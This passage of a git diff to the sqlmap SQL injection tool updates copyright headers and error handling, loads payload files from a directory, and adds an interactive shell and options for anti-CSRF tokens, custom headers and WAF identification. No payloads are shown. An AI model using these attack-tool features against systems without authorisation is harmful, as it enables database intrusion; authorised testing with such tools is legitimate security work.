         self.counter = -1
+        self.current = None
         self.iter = None
         self.custom = custom or []
         self.proc_id = proc_id
@@ -37,15 +39,15 @@ class Wordlist(object):
         elif self.index == len(self.filenames):
             self.iter = iter(self.custom)
         else:
-            current = self.filenames[self.index]
-            if os.path.splitext(current)[1].lower() == ".zip":
-                _ = zipfile.ZipFile(current, 'r')
+            self.current = self.filenames[self.index]
+            if os.path.splitext(self.current)[1].lower() == ".zip":
+                _ = zipfile.ZipFile(self.current, 'r')
                 if len(_.namelist()) == 0:
-                    errMsg = "no file(s) inside '%s'" % current
+                    errMsg = "no file(s) inside '%s'" % self.current
                     raise SqlmapDataException(errMsg)
                 self.fp = _.open(_.namelist()[0])
             else:
-                self.fp = open(current, 'r')
+                self.fp = open(self.current, 'r')
             self.iter = iter(self.fp)
 
         self.index += 1
@@ -61,6 +63,11 @@ class Wordlist(object):
             self.counter += 1
             try:
                 retVal = self.iter.next().rstrip()
+            except zipfile.error, ex:
+                errMsg = "something seems to be wrong with "
+                errMsg += "the file '%s' ('%s'). Please make " % (self.current, ex)
+                errMsg += "sure that you haven't made any changes to it"
+                raise SqlmapInstallationException, errMsg
             except StopIteration:
                 self.adjust()
                 retVal = self.iter.next().rstrip()
diff --git a/lib/parse/__init__.py b/lib/parse/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/parse/__init__.py
+++ b/lib/parse/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/parse/banner.py b/lib/parse/banner.py
index 293994ce4..c83c42aa0 100644
--- a/lib/parse/banner.py
+++ b/lib/parse/banner.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -9,7 +9,6 @@ import re
 
 from xml.sax.handler import ContentHandler
 
-from lib.core.common import checkFile
 from lib.core.common import Backend
 from lib.core.common import parseXmlFile
 from lib.core.common import sanitizeStr
@@ -63,7 +62,7 @@ class MSSQLBannerHandler(ContentHandler):
     def endElement(self, name):
         if name == "signature":
             for version in (self._version, self._versionAlt):
-                if version and re.search(r" %s[\.\ ]+" % version, self._banner):
+                if version and re.search(r" %s[\.\ ]+" % re.escape(version), self._banner):
                     self._feedInfo("dbmsRelease", self._release)
                     self._feedInfo("dbmsVersion", self._version)
                     self._feedInfo("dbmsServicePack", self._servicePack)
@@ -104,8 +103,6 @@ def bannerParser(banner):
     if not xmlfile:
         return
 
-    checkFile(xmlfile)
-
     if Backend.isDbms(DBMS.MSSQL):
         handler = MSSQLBannerHandler(banner, kb.bannerFp)
         parseXmlFile(xmlfile, handler)
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index ead78b126..154c5d7e3 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -1,11 +1,13 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
 import os
+import re
+import shlex
 import sys
 
 from optparse import OptionError
@@ -17,13 +19,22 @@ from lib.core.common import checkDeprecatedOptions
 from lib.core.common import checkSystemEncoding
 from lib.core.common import expandMnemonics
 from lib.core.common import getUnicode
+from lib.core.data import cmdLineOptions
+from lib.core.data import conf
 from lib.core.data import logger
 from lib.core.defaults import defaults
+from lib.core.enums import AUTOCOMPLETE_TYPE
+from lib.core.exception import SqlmapShellQuitException
+from lib.core.exception import SqlmapSyntaxException
 from lib.core.settings import BASIC_HELP_ITEMS
 from lib.core.settings import DUMMY_URL
 from lib.core.settings import IS_WIN
 from lib.core.settings import MAX_HELP_OPTION_LENGTH
 from lib.core.settings import VERSION_STRING
+from lib.core.shell import autoCompletion
+from lib.core.shell import clearHistory
+from lib.core.shell import loadHistory
+from lib.core.shell import saveHistory
 
 def cmdLineParser():
     """
@@ -32,7 +43,7 @@ def cmdLineParser():
 
     checkSystemEncoding()
 
-    _ = os.path.normpath(sys.argv[0])
+    _ = getUnicode(os.path.basename(sys.argv[0]), encoding=sys.getfilesystemencoding())
 
     usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
             "\"%s\"" % _ if " " in _ else _)
@@ -81,6 +92,9 @@ def cmdLineParser():
         request = OptionGroup(parser, "Request", "These options can be used "
                               "to specify how to connect to the target URL")
 
+        request.add_option("--method", dest="method",
+                           help="Force usage of given HTTP method (e.g. PUT)")
+
         request.add_option("--data", dest="data",
                            help="Data string to be sent through POST")
 
@@ -113,6 +127,9 @@ def cmdLineParser():
         request.add_option("--referer", dest="referer",
                            help="HTTP Referer header value")
 
+        request.add_option("-H", "--header", dest="header",
+                           help="Extra header (e.g. \"X-Forwarded-For: 127.0.0.1\")")
+
         request.add_option("--headers", dest="headers",
                            help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
 
@@ -127,6 +144,9 @@ def cmdLineParser():
         request.add_option("--auth-private", dest="authPrivate",
                            help="HTTP authentication PEM private key file")
 
+        request.add_option("--ignore-401", dest="ignore401", action="store_true",
+                          help="Ignore HTTP Error 401 (Unauthorized)")
+
         request.add_option("--proxy", dest="proxy",
                            help="Use a proxy to connect to the target URL")
 
@@ -168,16 +188,28 @@ def cmdLineParser():
         request.add_option("--randomize", dest="rParam",
                            help="Randomly change value for given parameter(s)")
 
-        request.add_option("--safe-url", dest="safUrl",
+        request.add_option("--safe-url", dest="safeUrl",
                            help="URL address to visit frequently during testing")
 
-        request.add_option("--safe-freq", dest="saFreq", type="int",
+        request.add_option("--safe-post", dest="safePost",
+                           help="POST data to send to a safe URL")
+
+        request.add_option("--safe-req", dest="safeReqFile",
+                           help="Load safe HTTP request from a file")
+
+        request.add_option("--safe-freq", dest="safeFreq", type="int",
                            help="Test requests between two visits to a given safe URL")
 
         request.add_option("--skip-urlencode", dest="skipUrlEncode",
                            action="store_true",
                            help="Skip URL encoding of payload data")
 
+        request.add_option("--csrf-token", dest="csrfToken",
+                           help="Parameter used to hold anti-CSRF token")
+
+        request.add_option("--csrf-url", dest="csrfUrl",
+                           help="URL address to visit to extract anti-CSRF token")
+
         request.add_option("--force-ssl", dest="forceSSL",
                            action="store_true",
                            help="Force usage of SSL/HTTPS")
@@ -223,6 +255,9 @@ def cmdLineParser():
         injection.add_option("--skip", dest="skip",
                              help="Skip testing for given parameter(s)")
 
+        injection.add_option("--skip-static", dest="skipStatic", action="store_true",
+                             help="Skip testing parameters that not appear dynamic")
+
         injection.add_option("--dbms", dest="dbms",
                              help="Force back-end DBMS to this value")
 
@@ -271,7 +306,7 @@ def cmdLineParser():
                                   "default %d)" % defaults.level)
 
         detection.add_option("--risk", dest="risk", type="int",
-                             help="Risk of tests to perform (0-3, "
+                             help="Risk of tests to perform (1-3, "
                                   "default %d)" % defaults.level)
 
         detection.add_option("--string", dest="string",
@@ -451,7 +486,7 @@ def cmdLineParser():
         enumeration.add_option("--sql-file", dest="sqlFile",
                                help="Execute SQL statements from given file(s)")
 
-        # User-defined function options
+        # Brute force options
         brute = OptionGroup(parser, "Brute force", "These "
                           "options can be used to run brute force "
                           "checks")
@@ -583,7 +618,10 @@ def cmdLineParser():
                             help="Force character encoding used for data retrieval")
 
         general.add_option("--crawl", dest="crawlDepth", type="int",
-                                  help="Crawl the website starting from the target URL")
+                            help="Crawl the website starting from the target URL")
+
+        general.add_option("--crawl-exclude", dest="crawlExclude",
+                           help="Regexp to exclude pages from crawling (e.g. \"logout\")")
 
         general.add_option("--csv-del", dest="csvDel",
                                   help="Delimiting character used in CSV output "
@@ -651,11 +689,7 @@ def cmdLineParser():
                                   help="Set question answers (e.g. \"quit=N,follow=N\")")
 
         miscellaneous.add_option("--beep", dest="beep", action="store_true",
-                                  help="Make a beep sound when SQL injection is found")
-
-        miscellaneous.add_option("--check-waf", dest="checkWaf",
-                                  action="store_true",
-                                  help="Heuristically check for WAF/IPS/IDS protection")
+                                  help="Beep on question and/or when SQL injection is found")
 
         miscellaneous.add_option("--cleanup", dest="cleanup",
                                   action="store_true",
@@ -675,12 +709,16 @@ def cmdLineParser():
 
         miscellaneous.add_option("--identify-waf", dest="identifyWaf",
                                   action="store_true",
-                                  help="Make a through testing for a WAF/IPS/IDS protection")
+                                  help="Make a thorough testing for a WAF/IPS/IDS protection")
 
         miscellaneous.add_option("--mobile", dest="mobile",
                                   action="store_true",
                                   help="Imitate smartphone through HTTP User-Agent header")
 
+        miscellaneous.add_option("--offline", dest="offline",
+                                  action="store_true",
+                                  help="Work in offline mode (only use session data)")
+
         miscellaneous.add_option("--page-rank", dest="pageRank",
                                   action="store_true",
                                   help="Display page rank (PR) for Google dork results")
@@ -691,7 +729,10 @@ def cmdLineParser():
 
         miscellaneous.add_option("--smart", dest="smart",
                                   action="store_true",
-                                  help="Conduct through tests only if positive heuristic(s)")
+                                  help="Conduct thorough tests only if positive heuristic(s)")
+
+        miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
+                            help="Prompt for an interactive sqlmap shell")
 
         miscellaneous.add_option("--wizard", dest="wizard",
                                   action="store_true",
@@ -716,9 +757,6 @@ def cmdLineParser():
         parser.add_option("--force-dns", dest="forceDns", action="store_true",
                           help=SUPPRESS_HELP)
 
-        parser.add_option("--ignore-401", dest="ignore401", action="store_true",
-                          help=SUPPRESS_HELP)
-
         parser.add_option("--smoke-test", dest="smokeTest", action="store_true",
                           help=SUPPRESS_HELP)
 
@@ -765,22 +803,81 @@ def cmdLineParser():
         option = parser.get_option("-h")
         option.help = option.help.capitalize().replace("this help", "basic help")
 
-        args = []
+        argv = []
+        prompt = False
         advancedHelp = True
+        extraHeaders = []
 
         for arg in sys.argv:
-            args.append(getUnicode(arg, system=True))
+            argv.append(getUnicode(arg, encoding=sys.getfilesystemencoding()))
 
-        checkDeprecatedOptions(args)
+        checkDeprecatedOptions(argv)
+
+        prompt = "--sqlmap-shell" in argv
+
+        if prompt:
+            parser.usage = ""
+            cmdLineOptions.sqlmapShell = True
+
+            _ = ["x", "q", "exit", "quit", "clear"]
+
+            for option in parser.option_list:
+                _.extend(option._long_opts)
+                _.extend(option._short_opts)
+
+            for group in parser.option_groups:
+                for option in group.option_list:
+                    _.extend(option._long_opts)
+                    _.extend(option._short_opts)
+
+            autoCompletion(AUTOCOMPLETE_TYPE.SQLMAP, commands=_)
+
+            while True:
+                command = None
+
+                try:
+                    command = raw_input("sqlmap-shell> ").strip()
+                    command = getUnicode(command, encoding=sys.stdin.encoding)
+                except (KeyboardInterrupt, EOFError):
+                    print
+                    raise SqlmapShellQuitException
+
+                if not command:
+                    continue
+                elif command.lower() == "clear":
+                    clearHistory()                    
+                    print "[i] history cleared"
+                    saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
+                elif command.lower() in ("x", "q", "exit", "quit"):
+                    raise SqlmapShellQuitException
+                elif command[0] != '-':
+                    print "[!] invalid option(s) provided"
+                    print "[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'"
+                else:
+                    saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
+                    loadHistory(AUTOCOMPLETE_TYPE.SQLMAP)
+                    break
+
+            try:
+                for arg in shlex.split(command):
+                    argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
+            except ValueError, ex:
+                raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message
 
         # Hide non-basic options in basic help case
-        for i in xrange(len(sys.argv)):
-            if sys.argv[i] == '-hh':
-                sys.argv[i] = '-h'
-            elif sys.argv[i] == '--version':
-                print VERSION_STRING
+        for i in xrange(len(argv)):
+            if argv[i] == "-hh":
+                argv[i] = "-h"
+            elif argv[i] == "-H":
+                if i + 1 < len(argv):
+                    extraHeaders.append(argv[i + 1])
+            elif re.match(r"\A\d+!\Z", argv[i]) and argv[max(0, i - 1)] == "--threads" or re.match(r"\A--threads.+\d+!\Z", argv[i]):
+                argv[i] = argv[i][:-1]
+                conf.skipThreadCheck = True
+            elif argv[i] == "--version":
+                print VERSION_STRING.split('/')[-1]
                 raise SystemExit
-            elif sys.argv[i] == '-h':
+            elif argv[i] == "-h":
                 advancedHelp = False
                 for group in parser.option_groups[:]:
                     found = False
@@ -793,16 +890,25 @@ def cmdLineParser():
                         parser.option_groups.remove(group)
 
         try:
-            (args, _) = parser.parse_args(args)
+            (args, _) = parser.parse_args(argv)
+        except UnicodeEncodeError, ex:
+            print "\n[!] %s" % ex.object.encode("unicode-escape")
+            raise SystemExit
         except SystemExit:
-            if '-h' in sys.argv and not advancedHelp:
+            if "-h" in argv and not advancedHelp:
                 print "\n[!] to see full list of options run with '-hh'"
             raise
 
+        if extraHeaders:
+            if not args.headers:
+                args.headers = ""
+            delimiter = "\\n" if "\\n" in args.headers else "\n"
+            args.headers += delimiter + delimiter.join(extraHeaders)
+
         # Expand given mnemonic options (e.g. -z "ign,flu,bat")
-        for i in xrange(len(sys.argv) - 1):
-            if sys.argv[i] == '-z':
-                expandMnemonics(sys.argv[i + 1], parser, args)
+        for i in xrange(len(argv) - 1):
+            if argv[i] == "-z":
+                expandMnemonics(argv[i + 1], parser, args)
 
         if args.dummy:
             args.url = args.url or DUMMY_URL
diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py
index ec8f72100..507cce17b 100644
--- a/lib/parse/configfile.py
+++ b/lib/parse/configfile.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -11,6 +11,8 @@ from ConfigParser import MissingSectionHeaderError
 from ConfigParser import ParsingError
 
 from lib.core.common import checkFile
+from lib.core.common import getUnicode
+from lib.core.common import openFile
 from lib.core.common import unArrayizeValue
 from lib.core.common import UnicodeRawConfigParser
 from lib.core.data import conf
@@ -40,7 +42,7 @@ def configFileProxy(section, option, boolean=False, integer=False):
                 value = config.get(section, option)
         except ValueError, ex:
             errMsg = "error occurred while processing the option "
-            errMsg += "'%s' in provided configuration file ('%s')" % (option, str(ex))
+            errMsg += "'%s' in provided configuration file ('%s')" % (option, getUnicode(ex))
             raise SqlmapSyntaxException(errMsg)
 
         if value:
@@ -65,13 +67,13 @@ def configFileParser(configFile):
     logger.debug(debugMsg)
 
     checkFile(configFile)
-    configFP = codecs.open(configFile, "rb", UNICODE_ENCODING)
+    configFP = openFile(configFile, "rb")
 
     try:
         config = UnicodeRawConfigParser()
         config.readfp(configFP)
-    except (MissingSectionHeaderError, ParsingError), ex:
-        errMsg = "you have provided an invalid configuration file ('%s')" % str(ex)
+    except Exception, ex:
+        errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % ex.message
         raise SqlmapSyntaxException(errMsg)
 
     if not config.has_section("Target"):
diff --git a/lib/parse/handler.py b/lib/parse/handler.py
index 36a47671d..04950ecbd 100644
--- a/lib/parse/handler.py
+++ b/lib/parse/handler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/parse/headers.py b/lib/parse/headers.py
index 1cb08db7d..4ca97779c 100644
--- a/lib/parse/headers.py
+++ b/lib/parse/headers.py
@@ -1,14 +1,13 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
 import itertools
 import os
 
-from lib.core.common import checkFile
 from lib.core.common import parseXmlFile
 from lib.core.data import kb
 from lib.core.data import paths
@@ -36,7 +35,6 @@ def headersParser(headers):
     for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers):
         value = headers[header]
         xmlfile = kb.headerPaths[header]
-        checkFile(xmlfile)
 
         handler = FingerprintHandler(value, kb.headersFp)
 
diff --git a/lib/parse/html.py b/lib/parse/html.py
index 71fc988d5..3c40920e6 100644
--- a/lib/parse/html.py
+++ b/lib/parse/html.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -9,7 +9,6 @@ import re
 
 from xml.sax.handler import ContentHandler
 
-from lib.core.common import checkFile
 from lib.core.common import parseXmlFile
 from lib.core.data import kb
 from lib.core.data import paths
@@ -49,7 +48,6 @@ def htmlParser(page):
     """
 
     xmlfile = paths.ERRORS_XML
-    checkFile(xmlfile)
     handler = HTMLHandler(page)
 
     parseXmlFile(xmlfile, handler)
diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py
index 489a23990..a96867082 100644
--- a/lib/parse/payloads.py
+++ b/lib/parse/payloads.py
@@ -1,15 +1,18 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import os
+
 from xml.etree import ElementTree as et
 
 from lib.core.data import conf
 from lib.core.data import paths
 from lib.core.datatype import AttribDict
+from lib.core.exception import SqlmapInstallationException
 
 def cleanupVals(text, tag):
     if tag in ("clause", "where"):
@@ -66,7 +69,32 @@ def parseXmlNode(node):
 
         conf.tests.append(test)
 
-def loadPayloads():
-    doc = et.parse(paths.PAYLOADS_XML)
+def loadBoundaries():
+    try:
+        doc = et.parse(paths.BOUNDARIES_XML)
+    except Exception, ex:
+        errMsg = "something seems to be wrong with "
+        errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, ex)
+        errMsg += "sure that you haven't made any changes to it"
+        raise SqlmapInstallationException, errMsg
+
     root = doc.getroot()
     parseXmlNode(root)
+
+def loadPayloads():
+    payloadFiles = os.listdir(paths.SQLMAP_XML_PAYLOADS_PATH)
+    payloadFiles.sort()
+
+    for payloadFile in payloadFiles:
+        payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile)
+
+        try:
+            doc = et.parse(payloadFilePath)
+        except Exception, ex:
+            errMsg = "something seems to be wrong with "
+            errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, ex)
+            errMsg += "sure that you haven't made any changes to it"
+            raise SqlmapInstallationException, errMsg
+
+        root = doc.getroot()
+        parseXmlNode(root)
diff --git a/lib/parse/sitemap.py b/lib/parse/sitemap.py
index 16aaf1e47..009a63450 100644
--- a/lib/parse/sitemap.py
+++ b/lib/parse/sitemap.py
@@ -1,15 +1,17 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import httplib
 import re
 
 from lib.core.common import readInput
 from lib.core.data import kb
 from lib.core.data import logger
+from lib.core.exception import SqlmapSyntaxException
 from lib.request.connect import Connect as Request
 from thirdparty.oset.pyoset import oset
 
@@ -26,8 +28,13 @@ def parseSitemap(url, retVal=None):
             abortedFlag = False
             retVal = oset()
 
-        content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
-        for match in re.finditer(r"<loc>\s*([^<]+)", content):
+        try:
+            content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
+        except httplib.InvalidURL:
+            errMsg = "invalid URL given for sitemap ('%s')" % url
+            raise SqlmapSyntaxException, errMsg
+
+        for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
             if abortedFlag:
                 break
             url = match.group(1).strip()
diff --git a/lib/request/__init__.py b/lib/request/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/request/__init__.py
+++ b/lib/request/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/basic.py b/lib/request/basic.py
index 95a6b23ec..41829c0ce 100755
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -27,10 +27,10 @@ from lib.core.data import logger
 from lib.core.enums import HTTP_HEADER
 from lib.core.enums import PLACE
 from lib.core.exception import SqlmapCompressionException
+from lib.core.settings import BLOCKED_IP_REGEX
 from lib.core.settings import DEFAULT_COOKIE_DELIMITER
 from lib.core.settings import EVENTVALIDATION_REGEX
 from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
-from lib.core.settings import ML
 from lib.core.settings import META_CHARSET_REGEX
 from lib.core.settings import PARSE_HEADERS_LIMIT
 from lib.core.settings import VIEWSTATE_REGEX
@@ -38,6 +38,7 @@ from lib.parse.headers import headersParser
 from lib.parse.html import htmlParser
 from lib.utils.htmlentities import htmlEntities
 from thirdparty.chardet import detect
+from thirdparty.odict.odict import OrderedDict
 
 def forgeHeaders(items=None):
     """
@@ -51,8 +52,8 @@ def forgeHeaders(items=None):
         if items[_] is None:
             del items[_]
 
-    headers = dict(conf.httpHeaders)
-    headers.update(items or {})
+    headers = OrderedDict(conf.httpHeaders)
+    headers.update(items.items())
 
     class _str(str):
         def capitalize(self):
@@ -62,9 +63,15 @@ def forgeHeaders(items=None):
             return _str(self)
 
     _ = headers
-    headers = {}
+    headers = OrderedDict()
     for key, value in _.items():
         success = False
+
+        for _ in headers:
+            if _.upper() == key.upper():
+                del headers[_]
+                break
+
         if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)):
             try:
                 headers[_str(key)] = value  # dirty hack for http://bugs.python.org/issue12455
@@ -93,8 +100,8 @@ def forgeHeaders(items=None):
                         _ = readInput(message, default="Y")
                         kb.mergeCookies = not _ or _[0] in ("y", "Y")
 
-                    if kb.mergeCookies:
-                        _ = lambda x: re.sub("(?i)%s=[^%s]+" % (cookie.name, conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x)
+                    if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:
+                        _ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x)
                         headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
 
                         if PLACE.COOKIE in conf.parameters:
@@ -105,7 +112,7 @@ def forgeHeaders(items=None):
                 elif not kb.testMode:
                     headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, cookie.name, getUnicode(cookie.value))
 
-        if kb.testMode:
+        if kb.testMode and not conf.csrfToken:
             resetCookieJar(conf.cj)
 
     return headers
@@ -141,7 +148,7 @@ def checkCharEncoding(encoding, warn=True):
         return encoding
 
     # Reference: http://www.destructor.de/charsets/index.htm
-    translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8",  "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk"}
+    translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8",  "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932"}
 
     for delimiter in (';', ',', '('):
         if delimiter in encoding:
@@ -194,7 +201,7 @@ def checkCharEncoding(encoding, warn=True):
     except LookupError:
         if warn:
             warnMsg = "unknown web page charset '%s'. " % encoding
-            warnMsg += "Please report by e-mail to %s." % ML
+            warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
             singleTimeLogMessage(warnMsg, logging.WARN, encoding)
         encoding = None
 
@@ -257,7 +264,7 @@ def decodePage(page, contentEncoding, contentType):
 
         if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset)))\
             or (httpCharset == metaCharset and all((httpCharset, metaCharset))):
-            kb.pageEncoding = httpCharset or metaCharset
+            kb.pageEncoding = httpCharset or metaCharset  # Reference: http://bytes.com/topic/html-css/answers/154758-http-equiv-vs-true-header-has-precedence
             debugMsg = "declared web page charset '%s'" % kb.pageEncoding
             singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg)
         else:
@@ -267,39 +274,45 @@ def decodePage(page, contentEncoding, contentType):
 
     # can't do for all responses because we need to support binary files too
     if contentType and not isinstance(page, unicode) and "text/" in contentType.lower():
-        # e.g. &#195;&#235;&#224;&#226;&#224;
-        if "&#" in page:
-            page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page)
+        if kb.heuristicMode:
+            kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
+            page = getUnicode(page, kb.pageEncoding)
+        else:
+            # e.g. &#195;&#235;&#224;&#226;&#224;
+            if "&#" in page:
+                page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page)
 
-        # e.g. %20%28%29
-        if "%" in page:
-            page = re.sub(r"%([0-9a-fA-F]{2})", lambda _: _.group(1).decode("hex"), page)
+            # e.g. %20%28%29
+            if "%" in page:
+                page = re.sub(r"%([0-9a-fA-F]{2})", lambda _: _.group(1).decode("hex"), page)
 
-        # e.g. &amp;
-        page = re.sub(r"&([^;]+);", lambda _: chr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 256) < 256 else _.group(0), page)
+            # e.g. &amp;
+            page = re.sub(r"&([^;]+);", lambda _: chr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 256) < 256 else _.group(0), page)
 
-        kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
-        page = getUnicode(page, kb.pageEncoding)
+            kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
+            page = getUnicode(page, kb.pageEncoding)
 
-        # e.g. &#8217;&#8230;&#8482;
-        if "&#" in page:
-            def _(match):
-                retVal = match.group(0)
-                try:
-                    retVal = unichr(int(match.group(1)))
-                except ValueError:
-                    pass
-                return retVal
-            page = re.sub(r"&#(\d+);", _, page)
+            # e.g. &#8217;&#8230;&#8482;
+            if "&#" in page:
+                def _(match):
+                    retVal = match.group(0)
+                    try:
+                        retVal = unichr(int(match.group(1)))
+                    except ValueError:
+                        pass
+                    return retVal
+                page = re.sub(r"&#(\d+);", _, page)
 
-        # e.g. &zeta;
-        page = re.sub(r"&([^;]+);", lambda _: unichr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 0) > 255 else _.group(0), page)
+            # e.g. &zeta;
+            page = re.sub(r"&([^;]+);", lambda _: unichr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 0) > 255 else _.group(0), page)
 
     return page
 
 def processResponse(page, responseHeaders):
     kb.processResponseCounter += 1
 
+    page = page or ""
+
     parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None)
 
     if conf.parseErrors:
@@ -318,3 +331,7 @@ def processResponse(page, responseHeaders):
                         continue
                     conf.paramDict[PLACE.POST][name] = value
                 conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST])
+
+    if re.search(BLOCKED_IP_REGEX, page):
+        errMsg = "it appears that you have been blocked by the target server"
+        singleTimeLogMessage(errMsg, logging.ERROR)
diff --git a/lib/request/basicauthhandler.py b/lib/request/basicauthhandler.py
index 66a96606e..487dac387 100644
--- a/lib/request/basicauthhandler.py
+++ b/lib/request/basicauthhandler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/comparison.py b/lib/request/comparison.py
index 0966c3695..0cfb53957 100644
--- a/lib/request/comparison.py
+++ b/lib/request/comparison.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -132,8 +132,21 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
             seq1 = seq1[count:]
             seq2 = seq2[count:]
 
-        seqMatcher.set_seq1(seq1)
-        seqMatcher.set_seq2(seq2)
+        while True:
+            try:
+                seqMatcher.set_seq1(seq1)
+            except MemoryError:
+                seq1 = seq1[:len(seq1) / 1024]
+            else:
+                break
+
+        while True:
+            try:
